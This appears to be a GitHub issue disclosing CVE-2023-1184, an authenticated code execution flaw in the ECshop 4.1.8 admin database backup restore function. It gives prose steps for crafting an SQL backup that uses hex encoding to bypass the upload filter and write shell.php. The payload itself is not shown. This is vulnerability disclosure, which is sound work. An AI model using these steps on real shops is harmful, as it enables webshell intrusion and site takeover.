Headline
CVE-2023-1184: ecshop v4.1.8 RCE vulnerability · Issue #1 · wjzdalao/ecshop4.1.8
A vulnerability, which was classified as problematic, has been found in ECshop up to 4.1.8. Affected by this issue is some unknown functionality of the file admin/database.php of the component Backup Database Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222356.
ECSHOP 4.1.8 Code Execution Vulnerability
Replication environment: download the source code and build the environment for source code audit
Vulnerability recurrence:
After the construction is completed, we can visit http://domain/admin Use ECshop account to enter the Website background
Select a backup database under Database ->backup. After opening it, you can see its header and footer format is
In the same format, we can construct the commands we want the database to execute, such as
After construction, select the constructed sql file in Database ->backup ->Restore backup and submit it
At this time, shell.php is successfully written under the target folder
The is that the content of the uploaded sql file is filtered in admin/database.php when uploading the sql file, but it can still be inserted into the table of the database through hexadecimal, and then read the data in the table to bypass.
After a successful upload, the command will be automatically executed.
At the same time, when uploading the sql file, it will be automatically replaced ‘\r\n’ to '
', then we can’t bypass the filter.And while the line feed in Windows is ‘/r/n’ so if you need to manually change it to ‘/n’ in Windows.